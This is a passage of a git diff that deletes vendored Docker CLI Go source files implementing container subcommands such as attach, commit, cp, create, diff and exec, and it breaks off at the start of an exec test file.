-func NewAttachCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts attachOptions
-
-	cmd := &cobra.Command{
-		Use:   "attach [OPTIONS] CONTAINER",
-		Short: "Attach to a running container",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.container = args[0]
-			return runAttach(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVar(&opts.noStdin, "no-stdin", false, "Do not attach STDIN")
-	flags.BoolVar(&opts.proxy, "sig-proxy", true, "Proxy all received signals to the process")
-	flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container")
-	return cmd
-}
-
-func runAttach(dockerCli *command.DockerCli, opts *attachOptions) error {
-	ctx := context.Background()
-	client := dockerCli.Client()
-
-	c, err := client.ContainerInspect(ctx, opts.container)
-	if err != nil {
-		return err
-	}
-
-	if !c.State.Running {
-		return fmt.Errorf("You cannot attach to a stopped container, start it first")
-	}
-
-	if c.State.Paused {
-		return fmt.Errorf("You cannot attach to a paused container, unpause it first")
-	}
-
-	if err := dockerCli.In().CheckTty(!opts.noStdin, c.Config.Tty); err != nil {
-		return err
-	}
-
-	if opts.detachKeys != "" {
-		dockerCli.ConfigFile().DetachKeys = opts.detachKeys
-	}
-
-	options := types.ContainerAttachOptions{
-		Stream:     true,
-		Stdin:      !opts.noStdin && c.Config.OpenStdin,
-		Stdout:     true,
-		Stderr:     true,
-		DetachKeys: dockerCli.ConfigFile().DetachKeys,
-	}
-
-	var in io.ReadCloser
-	if options.Stdin {
-		in = dockerCli.In()
-	}
-
-	if opts.proxy && !c.Config.Tty {
-		sigc := ForwardAllSignals(ctx, dockerCli, opts.container)
-		defer signal.StopCatch(sigc)
-	}
-
-	resp, errAttach := client.ContainerAttach(ctx, opts.container, options)
-	if errAttach != nil && errAttach != httputil.ErrPersistEOF {
-		// ContainerAttach returns an ErrPersistEOF (connection closed)
-		// means server met an error and put it in Hijacked connection
-		// keep the error and read detailed error message from hijacked connection later
-		return errAttach
-	}
-	defer resp.Close()
-
-	if c.Config.Tty && dockerCli.Out().IsTerminal() {
-		height, width := dockerCli.Out().GetTtySize()
-		// To handle the case where a user repeatedly attaches/detaches without resizing their
-		// terminal, the only way to get the shell prompt to display for attaches 2+ is to artificially
-		// resize it, then go back to normal. Without this, every attach after the first will
-		// require the user to manually resize or hit enter.
-		resizeTtyTo(ctx, client, opts.container, height+1, width+1, false)
-
-		// After the above resizing occurs, the call to MonitorTtySize below will handle resetting back
-		// to the actual size.
-		if err := MonitorTtySize(ctx, dockerCli, opts.container, false); err != nil {
-			logrus.Debugf("Error monitoring TTY size: %s", err)
-		}
-	}
-	if err := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp); err != nil {
-		return err
-	}
-
-	if errAttach != nil {
-		return errAttach
-	}
-
-	_, status, err := getExitCode(ctx, dockerCli, opts.container)
-	if err != nil {
-		return err
-	}
-	if status != 0 {
-		return cli.StatusError{StatusCode: status}
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/cmd.go b/vendor/github.com/docker/docker/cli/command/container/cmd.go
deleted file mode 100644
index 3e9b4880ac..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/cmd.go
+++ /dev/null
@@ -1,46 +0,0 @@
-package container
-
-import (
-	"github.com/spf13/cobra"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-)
-
-// NewContainerCommand returns a cobra command for `container` subcommands
-func NewContainerCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "container",
-		Short: "Manage containers",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-	}
-	cmd.AddCommand(
-		NewAttachCommand(dockerCli),
-		NewCommitCommand(dockerCli),
-		NewCopyCommand(dockerCli),
-		NewCreateCommand(dockerCli),
-		NewDiffCommand(dockerCli),
-		NewExecCommand(dockerCli),
-		NewExportCommand(dockerCli),
-		NewKillCommand(dockerCli),
-		NewLogsCommand(dockerCli),
-		NewPauseCommand(dockerCli),
-		NewPortCommand(dockerCli),
-		NewRenameCommand(dockerCli),
-		NewRestartCommand(dockerCli),
-		NewRmCommand(dockerCli),
-		NewRunCommand(dockerCli),
-		NewStartCommand(dockerCli),
-		NewStatsCommand(dockerCli),
-		NewStopCommand(dockerCli),
-		NewTopCommand(dockerCli),
-		NewUnpauseCommand(dockerCli),
-		NewUpdateCommand(dockerCli),
-		NewWaitCommand(dockerCli),
-		newListCommand(dockerCli),
-		newInspectCommand(dockerCli),
-		NewPruneCommand(dockerCli),
-	)
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/commit.go b/vendor/github.com/docker/docker/cli/command/container/commit.go
deleted file mode 100644
index cf8d0102a6..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/commit.go
+++ /dev/null
@@ -1,76 +0,0 @@
-package container
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	dockeropts "github.com/docker/docker/opts"
-	"github.com/spf13/cobra"
-)
-
-type commitOptions struct {
-	container string
-	reference string
-
-	pause   bool
-	comment string
-	author  string
-	changes dockeropts.ListOpts
-}
-
-// NewCommitCommand creates a new cobra.Command for `docker commit`
-func NewCommitCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts commitOptions
-
-	cmd := &cobra.Command{
-		Use:   "commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]]",
-		Short: "Create a new image from a container's changes",
-		Args:  cli.RequiresRangeArgs(1, 2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.container = args[0]
-			if len(args) > 1 {
-				opts.reference = args[1]
-			}
-			return runCommit(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.SetInterspersed(false)
-
-	flags.BoolVarP(&opts.pause, "pause", "p", true, "Pause container during commit")
-	flags.StringVarP(&opts.comment, "message", "m", "", "Commit message")
-	flags.StringVarP(&opts.author, "author", "a", "", "Author (e.g., \"John Hannibal Smith <hannibal@a-team.com>\")")
-
-	opts.changes = dockeropts.NewListOpts(nil)
-	flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image")
-
-	return cmd
-}
-
-func runCommit(dockerCli *command.DockerCli, opts *commitOptions) error {
-	ctx := context.Background()
-
-	name := opts.container
-	reference := opts.reference
-
-	options := types.ContainerCommitOptions{
-		Reference: reference,
-		Comment:   opts.comment,
-		Author:    opts.author,
-		Changes:   opts.changes.GetAll(),
-		Pause:     opts.pause,
-	}
-
-	response, err := dockerCli.Client().ContainerCommit(ctx, name, options)
-	if err != nil {
-		return err
-	}
-
-	fmt.Fprintln(dockerCli.Out(), response.ID)
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/cp.go b/vendor/github.com/docker/docker/cli/command/container/cp.go
deleted file mode 100644
index 17ab2accf9..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/cp.go
+++ /dev/null
@@ -1,303 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/system"
-	"github.com/spf13/cobra"
-)
-
-type copyOptions struct {
-	source      string
-	destination string
-	followLink  bool
-}
-
-type copyDirection int
-
-const (
-	fromContainer copyDirection = (1 << iota)
-	toContainer
-	acrossContainers = fromContainer | toContainer
-)
-
-type cpConfig struct {
-	followLink bool
-}
-
-// NewCopyCommand creates a new `docker cp` command
-func NewCopyCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts copyOptions
-
-	cmd := &cobra.Command{
-		Use: `cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|-
-	docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH`,
-		Short: "Copy files/folders between a container and the local filesystem",
-		Long: strings.Join([]string{
-			"Copy files/folders between a container and the local filesystem\n",
-			"\nUse '-' as the source to read a tar archive from stdin\n",
-			"and extract it to a directory destination in a container.\n",
-			"Use '-' as the destination to stream a tar archive of a\n",
-			"container source to stdout.",
-		}, ""),
-		Args: cli.ExactArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			if args[0] == "" {
-				return fmt.Errorf("source can not be empty")
-			}
-			if args[1] == "" {
-				return fmt.Errorf("destination can not be empty")
-			}
-			opts.source = args[0]
-			opts.destination = args[1]
-			return runCopy(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.BoolVarP(&opts.followLink, "follow-link", "L", false, "Always follow symbol link in SRC_PATH")
-
-	return cmd
-}
-
-func runCopy(dockerCli *command.DockerCli, opts copyOptions) error {
-	srcContainer, srcPath := splitCpArg(opts.source)
-	dstContainer, dstPath := splitCpArg(opts.destination)
-
-	var direction copyDirection
-	if srcContainer != "" {
-		direction |= fromContainer
-	}
-	if dstContainer != "" {
-		direction |= toContainer
-	}
-
-	cpParam := &cpConfig{
-		followLink: opts.followLink,
-	}
-
-	ctx := context.Background()
-
-	switch direction {
-	case fromContainer:
-		return copyFromContainer(ctx, dockerCli, srcContainer, srcPath, dstPath, cpParam)
-	case toContainer:
-		return copyToContainer(ctx, dockerCli, srcPath, dstContainer, dstPath, cpParam)
-	case acrossContainers:
-		// Copying between containers isn't supported.
-		return fmt.Errorf("copying between containers is not supported")
-	default:
-		// User didn't specify any container.
-		return fmt.Errorf("must specify at least one container source")
-	}
-}
-
-func statContainerPath(ctx context.Context, dockerCli *command.DockerCli, containerName, path string) (types.ContainerPathStat, error) {
-	return dockerCli.Client().ContainerStatPath(ctx, containerName, path)
-}
-
-func resolveLocalPath(localPath string) (absPath string, err error) {
-	if absPath, err = filepath.Abs(localPath); err != nil {
-		return
-	}
-
-	return archive.PreserveTrailingDotOrSeparator(absPath, localPath), nil
-}
-
-func copyFromContainer(ctx context.Context, dockerCli *command.DockerCli, srcContainer, srcPath, dstPath string, cpParam *cpConfig) (err error) {
-	if dstPath != "-" {
-		// Get an absolute destination path.
-		dstPath, err = resolveLocalPath(dstPath)
-		if err != nil {
-			return err
-		}
-	}
-
-	// if client requests to follow symbol link, then must decide target file to be copied
-	var rebaseName string
-	if cpParam.followLink {
-		srcStat, err := statContainerPath(ctx, dockerCli, srcContainer, srcPath)
-
-		// If the destination is a symbolic link, we should follow it.
-		if err == nil && srcStat.Mode&os.ModeSymlink != 0 {
-			linkTarget := srcStat.LinkTarget
-			if !system.IsAbs(linkTarget) {
-				// Join with the parent directory.
-				srcParent, _ := archive.SplitPathDirEntry(srcPath)
-				linkTarget = filepath.Join(srcParent, linkTarget)
-			}
-
-			linkTarget, rebaseName = archive.GetRebaseName(srcPath, linkTarget)
-			srcPath = linkTarget
-		}
-
-	}
-
-	content, stat, err := dockerCli.Client().CopyFromContainer(ctx, srcContainer, srcPath)
-	if err != nil {
-		return err
-	}
-	defer content.Close()
-
-	if dstPath == "-" {
-		// Send the response to STDOUT.
-		_, err = io.Copy(os.Stdout, content)
-
-		return err
-	}
-
-	// Prepare source copy info.
-	srcInfo := archive.CopyInfo{
-		Path:       srcPath,
-		Exists:     true,
-		IsDir:      stat.Mode.IsDir(),
-		RebaseName: rebaseName,
-	}
-
-	preArchive := content
-	if len(srcInfo.RebaseName) != 0 {
-		_, srcBase := archive.SplitPathDirEntry(srcInfo.Path)
-		preArchive = archive.RebaseArchiveEntries(content, srcBase, srcInfo.RebaseName)
-	}
-	// See comments in the implementation of `archive.CopyTo` for exactly what
-	// goes into deciding how and whether the source archive needs to be
-	// altered for the correct copy behavior.
-	return archive.CopyTo(preArchive, srcInfo, dstPath)
-}
-
-func copyToContainer(ctx context.Context, dockerCli *command.DockerCli, srcPath, dstContainer, dstPath string, cpParam *cpConfig) (err error) {
-	if srcPath != "-" {
-		// Get an absolute source path.
-		srcPath, err = resolveLocalPath(srcPath)
-		if err != nil {
-			return err
-		}
-	}
-
-	// In order to get the copy behavior right, we need to know information
-	// about both the source and destination. The API is a simple tar
-	// archive/extract API but we can use the stat info header about the
-	// destination to be more informed about exactly what the destination is.
-
-	// Prepare destination copy info by stat-ing the container path.
-	dstInfo := archive.CopyInfo{Path: dstPath}
-	dstStat, err := statContainerPath(ctx, dockerCli, dstContainer, dstPath)
-
-	// If the destination is a symbolic link, we should evaluate it.
-	if err == nil && dstStat.Mode&os.ModeSymlink != 0 {
-		linkTarget := dstStat.LinkTarget
-		if !system.IsAbs(linkTarget) {
-			// Join with the parent directory.
-			dstParent, _ := archive.SplitPathDirEntry(dstPath)
-			linkTarget = filepath.Join(dstParent, linkTarget)
-		}
-
-		dstInfo.Path = linkTarget
-		dstStat, err = statContainerPath(ctx, dockerCli, dstContainer, linkTarget)
-	}
-
-	// Ignore any error and assume that the parent directory of the destination
-	// path exists, in which case the copy may still succeed. If there is any
-	// type of conflict (e.g., non-directory overwriting an existing directory
-	// or vice versa) the extraction will fail. If the destination simply did
-	// not exist, but the parent directory does, the extraction will still
-	// succeed.
-	if err == nil {
-		dstInfo.Exists, dstInfo.IsDir = true, dstStat.Mode.IsDir()
-	}
-
-	var (
-		content         io.Reader
-		resolvedDstPath string
-	)
-
-	if srcPath == "-" {
-		// Use STDIN.
-		content = os.Stdin
-		resolvedDstPath = dstInfo.Path
-		if !dstInfo.IsDir {
-			return fmt.Errorf("destination %q must be a directory", fmt.Sprintf("%s:%s", dstContainer, dstPath))
-		}
-	} else {
-		// Prepare source copy info.
-		srcInfo, err := archive.CopyInfoSourcePath(srcPath, cpParam.followLink)
-		if err != nil {
-			return err
-		}
-
-		srcArchive, err := archive.TarResource(srcInfo)
-		if err != nil {
-			return err
-		}
-		defer srcArchive.Close()
-
-		// With the stat info about the local source as well as the
-		// destination, we have enough information to know whether we need to
-		// alter the archive that we upload so that when the server extracts
-		// it to the specified directory in the container we get the desired
-		// copy behavior.
-
-		// See comments in the implementation of `archive.PrepareArchiveCopy`
-		// for exactly what goes into deciding how and whether the source
-		// archive needs to be altered for the correct copy behavior when it is
-		// extracted. This function also infers from the source and destination
-		// info which directory to extract to, which may be the parent of the
-		// destination that the user specified.
-		dstDir, preparedArchive, err := archive.PrepareArchiveCopy(srcArchive, srcInfo, dstInfo)
-		if err != nil {
-			return err
-		}
-		defer preparedArchive.Close()
-
-		resolvedDstPath = dstDir
-		content = preparedArchive
-	}
-
-	options := types.CopyToContainerOptions{
-		AllowOverwriteDirWithFile: false,
-	}
-
-	return dockerCli.Client().CopyToContainer(ctx, dstContainer, resolvedDstPath, content, options)
-}
-
-// We use `:` as a delimiter between CONTAINER and PATH, but `:` could also be
-// in a valid LOCALPATH, like `file:name.txt`. We can resolve this ambiguity by
-// requiring a LOCALPATH with a `:` to be made explicit with a relative or
-// absolute path:
-// 	`/path/to/file:name.txt` or `./file:name.txt`
-//
-// This is apparently how `scp` handles this as well:
-// 	http://www.cyberciti.biz/faq/rsync-scp-file-name-with-colon-punctuation-in-it/
-//
-// We can't simply check for a filepath separator because container names may
-// have a separator, e.g., "host0/cname1" if container is in a Docker cluster,
-// so we have to check for a `/` or `.` prefix. Also, in the case of a Windows
-// client, a `:` could be part of an absolute Windows path, in which case it
-// is immediately proceeded by a backslash.
-func splitCpArg(arg string) (container, path string) {
-	if system.IsAbs(arg) {
-		// Explicit local absolute path, e.g., `C:\foo` or `/foo`.
-		return "", arg
-	}
-
-	parts := strings.SplitN(arg, ":", 2)
-
-	if len(parts) == 1 || strings.HasPrefix(parts[0], ".") {
-		// Either there's no `:` in the arg
-		// OR it's an explicit local relative path like `./file:name.txt`.
-		return "", arg
-	}
-
-	return parts[0], parts[1]
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/create.go b/vendor/github.com/docker/docker/cli/command/container/create.go
deleted file mode 100644
index d5e63bd9ef..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/create.go
+++ /dev/null
@@ -1,218 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"io"
-	"os"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/image"
-	"github.com/docker/docker/pkg/jsonmessage"
-	// FIXME migrate to docker/distribution/reference
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/container"
-	networktypes "github.com/docker/docker/api/types/network"
-	apiclient "github.com/docker/docker/client"
-	"github.com/docker/docker/reference"
-	"github.com/docker/docker/registry"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
-)
-
-type createOptions struct {
-	name string
-}
-
-// NewCreateCommand creates a new cobra.Command for `docker create`
-func NewCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts createOptions
-	var copts *runconfigopts.ContainerOptions
-
-	cmd := &cobra.Command{
-		Use:   "create [OPTIONS] IMAGE [COMMAND] [ARG...]",
-		Short: "Create a new container",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			copts.Image = args[0]
-			if len(args) > 1 {
-				copts.Args = args[1:]
-			}
-			return runCreate(dockerCli, cmd.Flags(), &opts, copts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.SetInterspersed(false)
-
-	flags.StringVar(&opts.name, "name", "", "Assign a name to the container")
-
-	// Add an explicit help that doesn't have a `-h` to prevent the conflict
-	// with hostname
-	flags.Bool("help", false, "Print usage")
-
-	command.AddTrustedFlags(flags, true)
-	copts = runconfigopts.AddFlags(flags)
-	return cmd
-}
-
-func runCreate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *createOptions, copts *runconfigopts.ContainerOptions) error {
-	config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts)
-	if err != nil {
-		reportError(dockerCli.Err(), "create", err.Error(), true)
-		return cli.StatusError{StatusCode: 125}
-	}
-	response, err := createContainer(context.Background(), dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name)
-	if err != nil {
-		return err
-	}
-	fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID)
-	return nil
-}
-
-func pullImage(ctx context.Context, dockerCli *command.DockerCli, image string, out io.Writer) error {
-	ref, err := reference.ParseNamed(image)
-	if err != nil {
-		return err
-	}
-
-	// Resolve the Repository name from fqn to RepositoryInfo
-	repoInfo, err := registry.ParseRepositoryInfo(ref)
-	if err != nil {
-		return err
-	}
-
-	authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index)
-	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
-	if err != nil {
-		return err
-	}
-
-	options := types.ImageCreateOptions{
-		RegistryAuth: encodedAuth,
-	}
-
-	responseBody, err := dockerCli.Client().ImageCreate(ctx, image, options)
-	if err != nil {
-		return err
-	}
-	defer responseBody.Close()
-
-	return jsonmessage.DisplayJSONMessagesStream(
-		responseBody,
-		out,
-		dockerCli.Out().FD(),
-		dockerCli.Out().IsTerminal(),
-		nil)
-}
-
-type cidFile struct {
-	path    string
-	file    *os.File
-	written bool
-}
-
-func (cid *cidFile) Close() error {
-	cid.file.Close()
-
-	if !cid.written {
-		if err := os.Remove(cid.path); err != nil {
-			return fmt.Errorf("failed to remove the CID file '%s': %s \n", cid.path, err)
-		}
-	}
-
-	return nil
-}
-
-func (cid *cidFile) Write(id string) error {
-	if _, err := cid.file.Write([]byte(id)); err != nil {
-		return fmt.Errorf("Failed to write the container ID to the file: %s", err)
-	}
-	cid.written = true
-	return nil
-}
-
-func newCIDFile(path string) (*cidFile, error) {
-	if _, err := os.Stat(path); err == nil {
-		return nil, fmt.Errorf("Container ID file found, make sure the other container isn't running or delete %s", path)
-	}
-
-	f, err := os.Create(path)
-	if err != nil {
-		return nil, fmt.Errorf("Failed to create the container ID file: %s", err)
-	}
-
-	return &cidFile{path: path, file: f}, nil
-}
-
-func createContainer(ctx context.Context, dockerCli *command.DockerCli, config *container.Config, hostConfig *container.HostConfig, networkingConfig *networktypes.NetworkingConfig, cidfile, name string) (*container.ContainerCreateCreatedBody, error) {
-	stderr := dockerCli.Err()
-
-	var containerIDFile *cidFile
-	if cidfile != "" {
-		var err error
-		if containerIDFile, err = newCIDFile(cidfile); err != nil {
-			return nil, err
-		}
-		defer containerIDFile.Close()
-	}
-
-	var trustedRef reference.Canonical
-	_, ref, err := reference.ParseIDOrReference(config.Image)
-	if err != nil {
-		return nil, err
-	}
-	if ref != nil {
-		ref = reference.WithDefaultTag(ref)
-
-		if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() {
-			var err error
-			trustedRef, err = image.TrustedReference(ctx, dockerCli, ref, nil)
-			if err != nil {
-				return nil, err
-			}
-			config.Image = trustedRef.String()
-		}
-	}
-
-	//create the container
-	response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name)
-
-	//if image not found try to pull it
-	if err != nil {
-		if apiclient.IsErrImageNotFound(err) && ref != nil {
-			fmt.Fprintf(stderr, "Unable to find image '%s' locally\n", ref.String())
-
-			// we don't want to write to stdout anything apart from container.ID
-			if err = pullImage(ctx, dockerCli, config.Image, stderr); err != nil {
-				return nil, err
-			}
-			if ref, ok := ref.(reference.NamedTagged); ok && trustedRef != nil {
-				if err := image.TagTrusted(ctx, dockerCli, trustedRef, ref); err != nil {
-					return nil, err
-				}
-			}
-			// Retry
-			var retryErr error
-			response, retryErr = dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name)
-			if retryErr != nil {
-				return nil, retryErr
-			}
-		} else {
-			return nil, err
-		}
-	}
-
-	for _, warning := range response.Warnings {
-		fmt.Fprintf(stderr, "WARNING: %s\n", warning)
-	}
-	if containerIDFile != nil {
-		if err = containerIDFile.Write(response.ID); err != nil {
-			return nil, err
-		}
-	}
-	return &response, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/diff.go b/vendor/github.com/docker/docker/cli/command/container/diff.go
deleted file mode 100644
index 12d6591014..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/diff.go
+++ /dev/null
@@ -1,58 +0,0 @@
-package container
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/archive"
-	"github.com/spf13/cobra"
-)
-
-type diffOptions struct {
-	container string
-}
-
-// NewDiffCommand creates a new cobra.Command for `docker diff`
-func NewDiffCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts diffOptions
-
-	return &cobra.Command{
-		Use:   "diff CONTAINER",
-		Short: "Inspect changes on a container's filesystem",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.container = args[0]
-			return runDiff(dockerCli, &opts)
-		},
-	}
-}
-
-func runDiff(dockerCli *command.DockerCli, opts *diffOptions) error {
-	if opts.container == "" {
-		return fmt.Errorf("Container name cannot be empty")
-	}
-	ctx := context.Background()
-
-	changes, err := dockerCli.Client().ContainerDiff(ctx, opts.container)
-	if err != nil {
-		return err
-	}
-
-	for _, change := range changes {
-		var kind string
-		switch change.Kind {
-		case archive.ChangeModify:
-			kind = "C"
-		case archive.ChangeAdd:
-			kind = "A"
-		case archive.ChangeDelete:
-			kind = "D"
-		}
-		fmt.Fprintf(dockerCli.Out(), "%s %s\n", kind, change.Path)
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/exec.go b/vendor/github.com/docker/docker/cli/command/container/exec.go
deleted file mode 100644
index f0381494e2..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/exec.go
+++ /dev/null
@@ -1,207 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"io"
-
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	apiclient "github.com/docker/docker/client"
-	options "github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/promise"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/spf13/cobra"
-)
-
-type execOptions struct {
-	detachKeys  string
-	interactive bool
-	tty         bool
-	detach      bool
-	user        string
-	privileged  bool
-	env         *options.ListOpts
-}
-
-func newExecOptions() *execOptions {
-	var values []string
-	return &execOptions{
-		env: options.NewListOptsRef(&values, runconfigopts.ValidateEnv),
-	}
-}
-
-// NewExecCommand creats a new cobra.Command for `docker exec`
-func NewExecCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := newExecOptions()
-
-	cmd := &cobra.Command{
-		Use:   "exec [OPTIONS] CONTAINER COMMAND [ARG...]",
-		Short: "Run a command in a running container",
-		Args:  cli.RequiresMinArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			container := args[0]
-			execCmd := args[1:]
-			return runExec(dockerCli, opts, container, execCmd)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.SetInterspersed(false)
-
-	flags.StringVarP(&opts.detachKeys, "detach-keys", "", "", "Override the key sequence for detaching a container")
-	flags.BoolVarP(&opts.interactive, "interactive", "i", false, "Keep STDIN open even if not attached")
-	flags.BoolVarP(&opts.tty, "tty", "t", false, "Allocate a pseudo-TTY")
-	flags.BoolVarP(&opts.detach, "detach", "d", false, "Detached mode: run command in the background")
-	flags.StringVarP(&opts.user, "user", "u", "", "Username or UID (format: <name|uid>[:<group|gid>])")
-	flags.BoolVarP(&opts.privileged, "privileged", "", false, "Give extended privileges to the command")
-	flags.VarP(opts.env, "env", "e", "Set environment variables")
-	flags.SetAnnotation("env", "version", []string{"1.25"})
-
-	return cmd
-}
-
-func runExec(dockerCli *command.DockerCli, opts *execOptions, container string, execCmd []string) error {
-	execConfig, err := parseExec(opts, execCmd)
-	// just in case the ParseExec does not exit
-	if container == "" || err != nil {
-		return cli.StatusError{StatusCode: 1}
-	}
-
-	if opts.detachKeys != "" {
-		dockerCli.ConfigFile().DetachKeys = opts.detachKeys
-	}
-
-	// Send client escape keys
-	execConfig.DetachKeys = dockerCli.ConfigFile().DetachKeys
-
-	ctx := context.Background()
-	client := dockerCli.Client()
-
-	response, err := client.ContainerExecCreate(ctx, container, *execConfig)
-	if err != nil {
-		return err
-	}
-
-	execID := response.ID
-	if execID == "" {
-		fmt.Fprintf(dockerCli.Out(), "exec ID empty")
-		return nil
-	}
-
-	//Temp struct for execStart so that we don't need to transfer all the execConfig
-	if !execConfig.Detach {
-		if err := dockerCli.In().CheckTty(execConfig.AttachStdin, execConfig.Tty); err != nil {
-			return err
-		}
-	} else {
-		execStartCheck := types.ExecStartCheck{
-			Detach: execConfig.Detach,
-			Tty:    execConfig.Tty,
-		}
-
-		if err := client.ContainerExecStart(ctx, execID, execStartCheck); err != nil {
-			return err
-		}
-		// For now don't print this - wait for when we support exec wait()
-		// fmt.Fprintf(dockerCli.Out(), "%s\n", execID)
-		return nil
-	}
-
-	// Interactive exec requested.
-	var (
-		out, stderr io.Writer
-		in          io.ReadCloser
-		errCh       chan error
-	)
-
-	if execConfig.AttachStdin {
-		in = dockerCli.In()
-	}
-	if execConfig.AttachStdout {
-		out = dockerCli.Out()
-	}
-	if execConfig.AttachStderr {
-		if execConfig.Tty {
-			stderr = dockerCli.Out()
-		} else {
-			stderr = dockerCli.Err()
-		}
-	}
-
-	resp, err := client.ContainerExecAttach(ctx, execID, *execConfig)
-	if err != nil {
-		return err
-	}
-	defer resp.Close()
-	errCh = promise.Go(func() error {
-		return holdHijackedConnection(ctx, dockerCli, execConfig.Tty, in, out, stderr, resp)
-	})
-
-	if execConfig.Tty && dockerCli.In().IsTerminal() {
-		if err := MonitorTtySize(ctx, dockerCli, execID, true); err != nil {
-			fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err)
-		}
-	}
-
-	if err := <-errCh; err != nil {
-		logrus.Debugf("Error hijack: %s", err)
-		return err
-	}
-
-	var status int
-	if _, status, err = getExecExitCode(ctx, client, execID); err != nil {
-		return err
-	}
-
-	if status != 0 {
-		return cli.StatusError{StatusCode: status}
-	}
-
-	return nil
-}
-
-// getExecExitCode perform an inspect on the exec command. It returns
-// the running state and the exit code.
-func getExecExitCode(ctx context.Context, client apiclient.ContainerAPIClient, execID string) (bool, int, error) {
-	resp, err := client.ContainerExecInspect(ctx, execID)
-	if err != nil {
-		// If we can't connect, then the daemon probably died.
-		if !apiclient.IsErrConnectionFailed(err) {
-			return false, -1, err
-		}
-		return false, -1, nil
-	}
-
-	return resp.Running, resp.ExitCode, nil
-}
-
-// parseExec parses the specified args for the specified command and generates
-// an ExecConfig from it.
-func parseExec(opts *execOptions, execCmd []string) (*types.ExecConfig, error) {
-	execConfig := &types.ExecConfig{
-		User:       opts.user,
-		Privileged: opts.privileged,
-		Tty:        opts.tty,
-		Cmd:        execCmd,
-		Detach:     opts.detach,
-	}
-
-	// If -d is not set, attach to everything by default
-	if !opts.detach {
-		execConfig.AttachStdout = true
-		execConfig.AttachStderr = true
-		if opts.interactive {
-			execConfig.AttachStdin = true
-		}
-	}
-
-	if opts.env != nil {
-		execConfig.Env = opts.env.GetAll()
-	}
-
-	return execConfig, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/exec_test.go b/vendor/github.com/docker/docker/cli/command/container/exec_test.go
deleted file mode 100644
index baeeaf1904..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/exec_test.go
+++ /dev/null
@@ -1,116 +0,0 @@
-package container
-
-import (
-	"testing"
-
